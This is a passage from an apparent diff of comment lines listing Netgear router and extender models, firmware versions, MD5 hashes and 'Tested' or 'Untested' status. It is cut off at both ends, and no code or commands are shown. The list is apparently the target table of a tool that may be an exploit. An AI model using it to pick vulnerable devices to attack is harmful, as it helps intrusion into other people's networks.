06c1b6ff9bac3e5c583f71f8cb63bd3a Untested +# D6220 V1.0.0.34_1.0.34 9a1fcd70a952b63ea874a826793e11ba Untested +# D6220 V1.0.0.32_1.0.32 5f9b38b2e4afcff3117f3f4d1bc454f4 Untested +# D6220 V1.1.0.28_1.0.28 5fa7890b766cbd6233043a601bdc990c Untested +# D6220 V1.0.0.24_1.0.24 1d8cfa4843dd9c4f1b1360beca080a81 Untested +# D6220 V1.0.0.22_1.0.22 3d1916d41b6e1e728238e5def8723b3e Untested +# D6220 V1.0.0.16_1.0.16 d5d19a4e7ba57850e4c09a01766cde3a Untested +# D6300 V1.0.0.102_1.0.102 8dd49d875e2683e396dc67381fadd057 Tested +# D6300 V1.0.0.96_1.1.96 5caa6056af76330fc0292657f192cb69 Untested +# D6300 V1.0.0.90_1.0.90 6196e4b48c9337fd5b89f527262f81dc Tested +# D6300 V1.0.0.88-1.0.88 d65d7d6db8a240bed2c845f9ce5ef8ed Untested +# D6300 V1.0.0.76_1.0.76 b4c98cc8ff8d9cd3c4a1f65c5c5f0fde Untested +# D6300 V1.0.0.72_1.0.72 d0690f900a0fa29b38266b04de51869e Untested +# D6300 V1.0.0.42_1.0.42 e86b7593f1e6d59f49fe4948379d0d69 Untested +# D6300 V1.0.0.30_1.0.30 f3691a3179fcd7390b62398f365a4c1a Untested +# D6300 V1.0.0.24_1.0.24 33cad70c5c307950fffded6c8f64066b Untested +# D6300 V1.0.0.16_1.0.16 55f4d6ac42eff8014254eadce033faac Untested +# D6400 V1.0.0.88_1.0.88 a9a31bd500dc6542969e039283b4f44f Untested +# D6400 V1.0.0.86_1.0.86 6ef83c99c829dc7e7d0a0907d3ed71a8 Untested +# D6400 V1.0.0.82_1.0.82 33c63fc65ecba162e8acbb85bed0dda0 Untested +# D6400 V1.0.0.80_1.0.80 4d9a3533b6e7afddfb2060649e44d092 Untested +# D6400 V1.0.0.78_1.0.78 6de4a742f7c7edd7241deda0fdfd5ab4 Untested +# D6400 V1.0.0.74_1.0.74 e692a2670b133efb293ecc3e3f9c82b4 Untested +# D6400 V1.0.0.70_1.0.70 a9a0cd9ebb6e45671b03a291f79cfaf0 Untested +# D6400 V1.0.0.68_1.0.68 226c662ecbf01f524cf0c0537220d652 Untested +# D6400 V1.0.0.66_1.0.66 a1986e8fe5c270d2e8a3f9416b086a85 Untested +# D6400 V1.0.0.60_1.0.60 1f74db16784172b4e8b385149b7b730c Untested +# D6400 V1.0.0.58_1.0.58 e62704fc3cec8611afc65643564943d2 Untested +# D6400 V1.0.0.56_1.0.56 b02401e956d4160c59a2f59a31da51bc Untested +# D6400 V1.0.0.54_1.0.54 632e9d26af86341f2eea25248e298b8c Untested +# D6400 V1.0.0.52_1.0.52 c54e25d1dcd814c44ee29b26337ca140 Untested +# D6400 V1.0.0.44_1.0.44 9b5cca485ed56ade5cb3d556c8bb975b Untested +# D6400 V1.0.0.38_1.1.38 b5729e40e61563f7a1a29359e0f9c78c Untested +# D6400 V1.0.0.34_1.3.34 5628ae2ce9326a63b050e96b6aa3fb79 Untested +# D6400 V1.0.0.22_1.0.22 1dc99a4d0952f648f1dab07d5cdd2a60 Untested +# D7000v2 V1.0.0.56_1.0.1 a35f742d1d7ebf7c882fa71bc6cd4d74 Untested +# D7000v2 V1.0.0.53_1.0.2 27d115ede639511d2eda25114dd82a5b Untested +# D7000v2 V1.0.0.52_1.0.1 827190546bcae129c56334674af3f669 Untested +# D7000v2 V1.0.0.51_1.0.1 0583d3f1fd97d3616a9e1448be12ee16 Untested +# D7000v2 V1.0.0.47_1.0.1 4880a731183fce2b4d47c5064c6d7236 Untested +# D7000v2 V1.0.0.45_1.0.1 2f1bc9a39d033d10c9ae73c299353524 Untested +# D7000v2 V1.0.0.44_1.0.1 7d37548ceda1aeb2a163b9616ecfc156 Untested +# D7000v2 V1.0.0.40_1.0.1 095c32dae5741f5342f5b5aaeeac6206 Untested +# D7000v2 V1.0.0.38_1.0.1 acca219a67790af0897f8ca6f1bd949f Untested +# D8500 V1.0.3.44_1.0.1 24352845696378cb0bcef38414d5640a Untested +# D8500 V1.0.3.43_1.0.1 b71e3b8eb1aedd615aafc9311dd36886 Untested +# D8500 V1.0.3.42_1.0.1 a567caf426cc76cd11ec3c3053519c8f Untested +# D8500 V1.0.3.39_1.0.1 ff56ddb8126f5aa1dfc4d85d2eeafce4 Untested +# D8500 V1.0.3.36_1.0.1 862a04b37c61fa9cadff8754d9f3abb2 Untested +# D8500 V1.0.3.35_1.0.1 16d4ab7b3357bda7e68a79b5b9022c4d Untested +# D8500 V1.0.3.28_1.0.1 94bbb72e108e68a774746a97cc7c00c0 Untested +# D8500 V1.0.3.27_1.0.1 822427e336366dd83c018e541d1d2d4f Untested +# D8500 V1.0.3.25_1.0.1 ddd3c3f02d1286f26344265d6db1bea5 Untested +# DC112A V1.0.0.44_1.0.60 e4721b08c70fcdc3dd1048cee49c2118 Untested +# DC112A V1.0.0.30_1.0.60 c11c0fb597c234e682fbbf3f5ba00d90 Untested +# DC112A V1.0.0.24_1.0.60 b2b677dff87eab44b4972ff4948532e6 Untested +# DGN2200 V1.0.0.58_7.0.57 db21e42ca1bf1878192fa7b1627b065a Tested +# DGN2200 V1.0.0.57_7.0.57 b5e9360ea0411e3e01e2901ec1c14c61 Untested +# DGN2200 V1.0.0.55_7.0.55 5853a3a4aa466ad491b23d2a59759f67 Untested +# DGN2200 V1.0.0.52_7.0.52 8286b50e5598cf314aa15d0ce204e36c Untested +# DGN2200 V1.0.0.50_7.0.50NA 6e37ab74491954b2763bdb6214848045 Untested +# DGN2200 V1.0.0.36_7.0.36NA 3ab21af915088055bcdfc5ade0af2c2c Untested +# DGN2200 V1.0.0.36_7.0.36 75a601e25219af4cf8a0c0978a3a1d71 Untested +# DGN2200v4 V1.0.0.110_1.0.110 5a8772a24aac9d15128bf928d748c1ab Untested +# DGN2200v4 V1.0.0.108_1.0.108 2ce2f58da92aba784e0d54e2b6ddfc22 Untested +# DGN2200v4 V1.0.0.102_1.0.102 c7f92c42a258d6e8eadcb9335f25afdb Tested +# DGN2200v4 V1.0.0.98_1.0.98 ce7f84170d80046146076c0212c46b22 Untested +# DGN2200v4 V1.0.0.90_1.0.90 fad68b99a9fb2eab63cbfc6b56951d82 Untested +# DGN2200v4 V1.0.0.86_1.0.86 6a81f9a1c610a9884308d58faf36e5a7 Untested +# DGN2200v4 V1.0.0.82_1.0.82 adfeaa24b82ff7a9ae3ce4a779f32240 Untested +# DGN2200v4 V1.0.0.76_1.0.76 6ca6a23431ea41ed6fbb2c71dc6d46f8 Untested +# DGN2200v4 V1.0.0.66_1.0.66 52e293aea6c51a08be9e00aa653217e2 Untested +# DGN2200v4 V1.0.0.62_1.0.62 e88ebcec9d158dfaf557c996a6034edc Untested +# DGN2200v4 V1.0.0.58_1.0.58 a7a3412bc7608971b6a0bf47c95a56d6 Untested +# DGN2200v4 V1.0.0.46_1.0.46 603daa3cedb8c6269257416c27f1e55b Untested +# DGN2200v4 V1.0.0.24_5.0.8 a9151f0c434e6b27135b628a8cf51134 Untested +# DGN2200v4 V1.0.0.5_5.0.3 4668835a74ecab6333889d7efe171361 Untested +# DGN2200M V1.0.0.37_1.0.21WW 87fbe2fa75d8acdee8022f71629d7d79 Tested +# DGN2200M V1.0.0.35_1.0.21WW ffd47e9d882ce4f3de11df49ce7a535b Tested +# DGN2200M V1.0.0.35_1.0.21NA a8edc9e918fde432f6979af0ea77aeb6 Untested +# DGN2200M V1.0.0.33_1.0.21WW 6868b9bd17a5a47c739c0bf68dc04875 Untested +# DGN2200M V1.0.0.33_1.0.21NA d8ddd5aef65509ee95239135aa3dfc71 Untested +# DGN2200M V1.0.0.26_1.0.20WW b2942e856d5690962d7b39d585d63c2d Untested +# DGN2200M V1.0.0.24_1.0.20NA 3cf45d175d4151dadd8d2823b7222121 Untested +# DGND3700 V1.0.0.17_1.0.17 b103c87de279c008bfd9793fb808125e Untested +# DGND3700 V1.0.0.17_1.0.17NA d88c70428a629ae3a899628e4d0d7f2c Untested +# DGND3700 V1.0.0.12_1.0.12 83fabbde0e49ab07a5ab77a94a5dd0d4 Untested +# DGND3700 V1.0.0.12_1.0.12NA c6735900e4239a2a474f82fea6b2bf2f Untested +# EX3700 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3700 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3700 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3700 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3700 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3700 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3700 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3700 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3700 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3700 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3700 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3700 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3700 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3700 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3700 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX3700 V1.0.0.24_1.0.18 64e7797362fe0b58c4eb71758b8fa5bf Untested +# EX3700 V1.0.0.22_1.0.17 ee6f11943d1cd33f87f6fddd01917f96 Untested +# EX3800 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3800 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3800 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3800 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3800 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3800 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3800 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3800 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3800 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3800 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3800 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3800 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3800 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3800 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3800 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX3920 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested +# EX3920 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested +# EX3920 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested +# EX3920 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested +# EX3920 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested +# EX3920 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested +# EX3920 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested +# EX3920 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested +# EX3920 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested +# EX3920 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested +# EX3920 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested +# EX3920 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested +# EX3920 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested +# EX3920 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested +# EX3920 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested +# EX6000 V1.0.0.38_1.0.22 fa48d3a1d76f0141022b70b37a139bfb Untested +# EX6000 V1.0.0.32_1.0.18 b119eb091db312c9223291cc12608bc4 Untested +# EX6000 V1.0.0.30_1.0.17 a4988eb60c3b548c8117ff79a4e0601e Untested +# EX6000 V1.0.0.28_1.0.16 dc2b1eb141909690af81ef5690cc5912 Untested +# EX6000 V1.0.0.24_1.0.14 26077a4cdaf21b6ba0d886ea070ce8d7 Untested +# EX6000 V1.0.0.20_1.0.11 f17de59371f715b6735f0f7f8c9042e9 Untested +# EX6000 V1.0.0.10_1.0.6 e507e02386a634b092be4a5e2118e7b1 Untested +# EX6100 V1.0.2.24_1.1.134 6fde4f0259baeb6a3680fb9796b920ab Tested +# EX6100 V1.0.2.18_1.1.131 5baa9a7007dff6000bf143231e8f43ce Untested +# EX6100 V1.0.2.16_1.1.130 ee1efa975138f748fbbb21a450b956a9 Untested +# EX6100 V1.0.2.6_1.1.120 f5a6e0de947f281261b0078fa306e631 Untested +# EX6100 V1.0.1.36_1.0.114 a1b3591183bc3f75dc280f0565b2c2c9 Untested +# EX6100 V1.0.0.28_1.0.66 7a39f661c1c6e7f3168dd9e805283f12 Tested +# EX6100 V1.0.0.22_1.0.51 0bb3870ff95764b2cd600c673d81af8e Untested +# EX6120 V1.0.0.48_1.0.30 e05613c38204f66c1c8003f5ec4bde0d Untested +# EX6120 V1.0.0.46_1.0.29 46a4c7f6f054665bed444c2f536b7bf0 Untested +# EX6120 V1.0.0.42_1.0.27 ddbaa705a3e54cf361735c559e500494 Untested +# EX6120 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested +# EX6120 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested +# EX6120 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested +# EX6120 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested +# EX6120 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested +# EX6120 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested +# EX6120 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested +# EX6120 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested +# EX6120 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested +# EX6120 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested +# EX6130 V1.0.0.30_1.0.17 947f815e4a2fe0678e7dd67c4b10cc99 Untested +# EX6130 V1.0.0.28_1.0.16 20db4ec9dfa72f0a3a6e5574b5663cb7 Untested +# EX6130 V1.0.0.24_1.0.14 355fe4afe7c8c017ed8048f39e3ad1e3 Untested +# EX6130 V1.0.0.22_1.0.13 6b87f60aa1ea4c6d9d44f2e8f32fc2aa Untested +# EX6130 V1.0.0.20_1.0.12 428b183f162edddacb3c4d4da0a2ecd6 Untested +# EX6130 V1.0.0.16_1.0.10 ede8953a631f5315085bfcbc50ac0534 Untested +# EX6130 V1.0.0.12_1.0.7 a1485ffd1b0afa2430c8ceb860fd12c8 Untested +# EX6150 V1.0.0.42_1.0.73 f826bb5b4850ec73c3c5522db0d9f3bb Untested +# EX6150 V1.0.0.34_1.0.69 ff4a9ac154f6dc5c58d8ee72c847d6dc Untested +# EX6150 V1.0.0.32_1.0.68 baf6e6074326d8da71b5e81d59fd2bbc Untested +# EX6150 V1.0.0.28_1.0.64 4209003e1c1c481ad66679918ccefd41 Untested +# EX6150 V1.0.0.16_1.0.58 56f1fa5cddc9a714796fd671e95d12ce Untested +# EX6150 V1.0.0.14_1.0.54 067b3adcde96e80e0bcc11ed9c846459 Untested +# EX6200 V1.0.3.90_1.1.125 884de197aa849e668ac7810561e92265 Untested +# EX6200 V1.0.3.88_1.1.123 6c183bb1b9b025cb30496dee0d9ab473 Untested +# EX6200 V1.0.3.82_1.1.117 91e4f5f7fd02adb693b79572a2f887a0 Untested +# EX6200 V1.0.3.76_1.1.111 c20025474fb29a28dc45e7b2c4566421 Untested +# EX6200 V1.0.3.74_1.1.109 c7e0ea632820e9674165190d2f7d8a57 Untested +# EX6200 V1.0.3.68_1.1.104 4fce79801c0ad403df3d627c0d3cc290 Untested +# EX6200 V1.0.1.60_1.1.98 49b23634828219d28739195b491749de Untested +# EX6200 V1.0.0.52_1.1.90 dc12bb1fb624fd72625f951d829c84be Untested +# EX6200 V1.0.0.46_1.1.70 49b158f381a21555d0c715c6e7c33d64 Untested +# EX6200 V1.0.0.42_1.1.57 4024cd22371a955861589cfdca67014d Untested +# EX6200 V1.0.0.38_1.1.52 2e6e9debfe5b93d54e18ec8f04a43480 Untested +# EX6920 V1.0.0.40_1.0.25 9d6ad5117207ffeda165dea3f9bb4f73 Untested +# EX6920 V1.0.0.36_1.0.23 cfdfa436b024e95d53630fd71f46c48e Untested +# EX6920 V1.0.0.32_1.0.21 58866ce4c45337157d573d904e2a4052 Untested +# EX6920 V1.0.0.30_1.0.20 817c93296f8149f6a8e41ef501918509 Untested +# EX6920 V1.0.0.28_1.0.18 feb144c0a06e2251647ff8a8bb88704b Untested +# EX6920 V1.0.0.26_1.0.16 90c4e8c9ef5c03e09989caf944a80cf3 Untested +# EX6920 V1.0.0.16_1.0.11 8f388e0ee15e32f9b7ee46d49d8e9ea2 Untested +# EX6920 V1.0.0.14_1.0.10 b6e59d1ef530c60a9ba03b8b28784cca Untested +# EX6920 V1.0.0.8_1.0.4 be69b611410dee663ca081d23e56cc9b Untested +# EX6920 V1.0.0.4_1.0.2 368cbc774798fb5233f82cb02277213b Untested +# EX7000 V1.0.1.84_1.0.148 769b68e697516fd40645e85266276844 Untested +# EX7000 V1.0.1.80_1.0.144 df02a32c3e8dfe22a0e10adf8f9cfa9d Untested +# EX7000 V1.0.1.78_1.0.140 cf3939b5cd5f3379084c164f0ab85ea5 Untested +# EX7000 V1.0.0.66_1.0.126 13ddf3f666fe43a4c988babf54861292 Untested +# EX7000 V1.0.0.62_1.0.122 ce6c2f13b057873db9fec0f7fdc86b5b Untested +# EX7000 V1.0.0.58_1.0.112 0b988da5188b0c2712a8414f34f68152 Untested +# EX7000 V1.0.0.56_1.0.108 40ce1aadf9810780d9b9d1cc6dd27a29 Untested +# EX7000 V1.0.0.50_1.0.102 f862e5ae2823f9187580796c90dd388b Untested +# EX7000 V1.0.0.42_1.0.94 be8bd31d14825930b8f6f9e4005b436e Untested +# EX7000 V1.0.0.38_1.0.91 04c5f1f03a3ed1491519c450e73a30df Untested +# EX7000 V1.0.0.36_1.0.88 ed80bd32dc66f080d962295130c7665c Untested +# EX7000 V1.0.0.32_1.0.84 00376a5055221c56217a93e41a5ef9c9 Untested +# EX7000 V1.0.0.30_1.0.72 e182cad2e1d3bfbc33142141958e62f5 Untested +# LG2200D V1.0.0.57_1.0.40 c788662b93484b512c97147f5e008ff9 Untested +# MBM621 V1.1.3 4ac9ddde0b40da6b2f8c9e66d7cb3560 Untested +# MBR624GU V6.01.30.64WW 367530253434926de55988a08e517828 Untested +# MBR624GU V6.01.30.61WW 7319b8c9ca2335024693e4f6ad02dfb1 Untested +# MBR624GU V6.01.30.59WW 6a78396265425537f2b15473d7f4fff6 Untested +# MBR624GU V6.01.30.59NA e4d0ec49da0956cc8b0fb7ff9461be4f Untested +# MBR624GU V6.00.30.46WW 6f984aa8e172204310226fdee94ab938 Untested +# MBR624GU V6.00.28.43WW e10b0ab92c8edc94975b345a102ef145 Untested +# MBR624GU V6.00.28.43NA 5c3e39fed6d914a836c99c397b3f1ec1 Untested +# MBR624GU V6.00.26.21WW ab6b6f1635dc27a6a93c5f172496286a Untested +# MBR624GU V6.00.22.14NA bafc32d9dc20f686f3162b263f391df6 Untested +# MBR624GU V6.00.22.12 7fe0d93833ffe7f74bc829e1054c8312 Untested +# MBR1200 V1.2.2.53 3ed99932142ee830544022ed0582e1d1 Untested +# MBR1515 V1.2.2.68 623d9ee0386c50c122fce6f3d6497c94 Untested +# MBR1516 V1.2.2.84BM cbf78bd7d7ee6c7a3a5375ae6dc07cec Untested +# MBRN3000 V1.0.0.74_2.0.12WW d496c9abe19b706d688fe11f9d48244f Untested +# MBRN3000 V1.0.0.72_2.0.12WW 0e5c04a9053070fbe09501ebd45148fb Untested +# MBRN3000 V1.0.0.72_2.0.12NA f5166bb95613b2c32d4a22b31adea533 Untested +# MBRN3000 V1.0.0.69_2.0.12WW 621647d9b23d6484c11d35ba8b28fc41 Untested +# MBRN3000 V1.0.0.69_2.0.12NA df4a8e61a3573f08e0f7e3c3a4925d45 Untested +# MBRN3000 V1.0.0.65_2.0.12WW 73f3a1d64c334e947cb5ca1f39f69301 Untested +# MBRN3000 V1.0.0.65_2.0.12NA d3ba7bcc00b3d09a72e0b1992c3fcdc4 Untested +# MBRN3000 V1.0.0.43NA cad281cfc42d26ffd88762d24074577b Untested +# MVBR1210C V1.2.0.35BM b36a65b43d84f12254ead93484e64691 Untested +# R4500 V1.0.0.4_1.0.3 eb878ea3ee999ebd2697d3a1ea6844b0 Untested +# R6200 V1.0.1.58_1.0.44 c5eb9a42ecad8deb05cdcfbba948489e Untested +# R6200 V1.0.1.56_1.0.43 b9ba700570eece0317d2d7e6f69375b1 Untested +# R6200 V1.0.1.52_1.0.41 d6fd17a8d8dec0cd65f85cf3b423b618 Untested +# R6200 V1.0.1.48_1.0.37 ba22d5de1d45e7b27ef02b54d76109c1 Untested +# R6200 V1.0.1.46_1.0.36 3b5ac031b2756daf2a22879750887491 Untested +# R6200 V1.0.0.28_1.0.24 32748ac05aed521902cdc94c79a9c7d0 Untested +# R6200 V1.0.0.18_1.0.18 b1e6175e31617dad54a2ebbdc0a0df6c Untested +# R6200v2 V1.0.3.12_10.1.11 0b0df46df490bb452369a8b2a8075039 Untested +# R6200v2 V1.0.3.10_10.1.10 8baf6ea213db77e77888566ceeb39ac1 Untested +# R6200v2 V1.0.1.20_1.0.18 e11bba1b0c9d7c882da165188d16a83b Untested +# R6200v2 V1.0.1.18_1.0.17 5b11e221cee499d20a0615461622ac79 Untested +# R6200v2 V1.0.1.16_1.0.15 b507812655353cc7ea1c95da7816f820 Untested +# R6200v2 V1.0.1.14_1.0.14 5076ce08e5bcaba94e510213e59bfff3 Untested +# R6250 V1.0.4.38_10.1.30 c84cc113aae5aa5a8e540898bda5bd5f Untested +# R6250 V1.0.4.36_10.1.30 216a9f879e881b5ae467790761c87ebd Tested +# R6250 V1.0.4.34_10.1.28 0dc8a4bab30dbbe4d8afcfcb360187ad Untested +# R6250 V1.0.4.26_10.1.23 3f1be99b50d35864d70d2aee5ecc33c6 Untested +# R6250 V1.0.4.20_10.1.20 2403a8ce4d04a584b19f0cf30f92bf56 Untested +# R6250 V1.0.4.16_10.1.18 fe6030d67f0a055903e55d405cb91e20 Untested +# R6250 V1.0.4.14_10.1.17 e0dc56338e8f16c1c38c0845291dafda Untested +# R6250 V1.0.4.12_10.1.15 0bc26be95cded31e5453d482085e723c Untested +# R6250 V1.0.4.8_10.1.13 8424c65f442d90638a6d0fc9bcf83d35 Untested +# R6250 V1.0.4.6_10.1.12 356b523cb24085686b65769e1872a583 Untested +# R6250 V1.0.4.2_10.1.10 4f119505aa1ad2c66db91ee74693442a Untested +# R6250 V1.0.3.12_10.1.8 c5ae345bf1d4b790df115ce17a1e2629 Untested +# R6250 V1.0.3.6_10.1.3 309fefe7f4c6e451adca8339107e3794 Untested +# R6250 V1.0.1.84_1.0.78 7dfdbdc609b182d6923f486f4d9c5283 Tested +# R6250 V1.0.1.82_1.0.77 d3cb80a6d4e32ac12a6ca996860179c7 Untested +# R6250 V1.0.1.80_1.0.75 cb32448faaa7dfc9031e82a80e3c6366 Untested +# R6250 V1.0.0.72_1.0.71 e8870c350aa8b1831de04528313b4597 Untested +# R6250 V1.0.0.70_1.0.70 8da51e46e4a0c8ce73b07afbcd4580f3 Untested +# R6250 V1.0.0.62_1.0.62 c086bcb2c79cf35f4369cf6a99f1c8a5 Untested +# R6300 V1.0.2.80_1.0.59 5fc46dc531417ecd3a45c7fbe23b2c99 Untested +# R6300 V1.0.2.78_1.0.58 ae302b1749a6d3462aa218c71b319ec4 Untested +# R6300 V1.0.2.76_1.0.57 a613643bbce2cec3c79f8f5896de9d9d Untested +# R6300 V1.0.2.70_1.0.50 43075b37dd29c100d412ef91bc26130e Untested +# R6300 V1.0.2.68_1.0.49 647341220a8706d9dc7c6023a7520f6e Untested +# R6300 V1.0.2.38_1.0.33 937ad68339a92c3672b205d26b29f348 Untested +# R6300 V1.0.2.36_1.0.28 9cceb9d7c494c68304babd23fda58a13 Untested +# R6300 V1.0.2.26_1.0.26 f44aba5cddc36eedebb08a74b40793db Untested +# R6300 V1.0.2.14_1.0.23 d9ce4aca0e55a0777083351958ad939c Untested +# R6300 V1.0.2.10_1.0.21 f8ae0c63ea66511e3f8e006d44236e5c Untested +# R6300 V1.0.0.90_1.0.18 87bb9b3375847616e30db052708b8442 Untested +# R6300 V1.0.0.68_1.0.16 f6276b5a3a319c423cb0bf6578098775 Untested +# R6300v2 V1.0.4.36_10.0.93 ad739a306344ba53c23dcec60b1f25ec Untested +# R6300v2 V1.0.4.34_10.0.92 e493f182ecd746d3de18df040a95211a Untested +# R6300v2 V1.0.4.32_10.0.91 0842fa456950808a355edb18795112b6 Tested +# R6300v2 V1.0.4.28_10.0.89 f4ae7abd7bff63b66f096255e4c428ca Untested +# R6300v2 V1.0.4.24_10.0.87 e05be33f9f55986c8f606be892fffc69 Untested +# R6300v2 V1.0.4.8_10.0.77 d6c9b72c67535e159ea7af739cd07926 Untested +# R6300v2 V1.0.4.6_10.0.76 a3d4fe0c8e7cd91a40724e9c7464fdf6 Untested +# R6300v2 V1.0.4.2_10.0.74 00f2196125d61b53ffd16dccaa7fde83 Untested +# R6300v2 V1.0.3.30_10.0.73 00c15e4a4cde88faaf3875914f959a2d Untested +# R6300v2 V1.0.3.28_10.0.71 cdb52e60dc2aaf5ca0944131451bad70 Untested +# R6300v2 V1.0.3.26_10.0.70 3c05bff70e44fa9458739e260d3cb647 Untested +# R6300v2 V1.0.3.22_10.0.67 6cda020fed0ae522671c15f7620c531f Untested +# R6300v2 V1.0.3.8_1.0.60 69637d313345d7d73d8f853ef2cac2b4 Tested +# R6300v2 V1.0.3.6_1.0.63CH 2871ac95aea8f1907ab2cce316a6dee9 Tested +# R6300v2 V1.0.3.2_1.0.57 e127e31093baddeee0b445dfb5b0585c Untested +# R6300v2 V1.0.2.86_1.0.51 67b4667c4f4d5a46a29bef1a705526ac Untested +# R6300v2 V1.0.2.72_1.0.46 b1edb9bbc305d22110f9231892784e3d Untested +# R6300v2 V1.0.1.72_1.0.21 907ce31e0d0c1a81f7f39b152490bb6c Untested +# R6400 V1.0.1.52_1.0.36 2d9bdc83337eaebd5b0764e4dfbf6615 Untested +# R6400 V1.0.1.50_1.0.35 82c8c7958cc51705e0388d17494a7e5b Untested +# R6400 V1.0.1.46_1.0.32 792259674ad727503af277ec1dfaacb1 Untested +# R6400 V1.0.1.44_1.0.31 eeab43c47589c596a25b8da901c0b986 Tested +# R6400 V1.0.1.42_1.0.28 f88a6ffd8b267951c1e3acf49041cb29 Untested +# R6400 V1.0.1.36_1.0.25 fbaea94679a9e93f317fa887b835aacd Tested +# R6400 V1.0.1.34_1.0.24 d272b88f46a0acd88449250bf7cb40d9 Untested +# R6400 V1.0.1.26_1.0.19 5c52c2422597a786afe6899afa51fe3f Untested +# R6400 V1.0.1.24_1.0.18 19e6711c51642615cd8da895bcb4f154 Untested +# R6400 V1.0.1.22_1.0.17 d790c8858dd1968bb0cbac73e7ae049b Untested +# R6400 V1.0.1.20_1.0.16 d8620afd06eb83c41350f490de6792df Tested +# R6400 V1.0.1.18_1.0.15 e98f59224c11fe7b7adbe4d35a2ae024 Untested +# R6400 V1.0.1.12_1.0.11 7541ede9feaa32df1e20b852f7a230a5 Untested +# R6400 V1.0.1.6_1.0.4 83ba47279692268739d82a7edfafc1ec Untested +# R6400 V1.0.0.26_1.0.14 5be5fe81595674f0a11a65982a8cf7e3 Untested +# R6400 V1.0.0.24_1.0.13 aa8531c26e10e4e4e612ea4a3df3f7c6 Untested +# R6400 V1.0.0.20_1.0.11 f320cf859f20f3faab341b47d570740e Untested +# R6400 V1.0.0.14_1.0.8 b66455bd7c21a54682e9987fa662ec35 Untested +# R6400v2 V1.0.4.84_10.0.58 25c0a4081adf5ff142074fd0d8014ac7 Untested +# R6400v2 V1.0.4.82_10.0.57 234bdb2fe2d358fa4dbce974ca98d8b0 Untested +# R6400v2 V1.0.4.78_10.0.55 c7dad31adf2562df42d1b020a56ab630 Untested +# R6400v2 V1.0.3.66_10.0.50 585dedb8fa86d0d8f6a4efb5591c501d Untested +# R6400v2 V1.0.2.66_10.0.48 43d36ce5d516a6121adff6aec8f5a7c7 Untested +# R6400v2 V1.0.2.62_10.0.46 11aa8cceef3708d911cb4b2919fe396a Untested +# R6400v2 V1.0.2.60_10.0.44 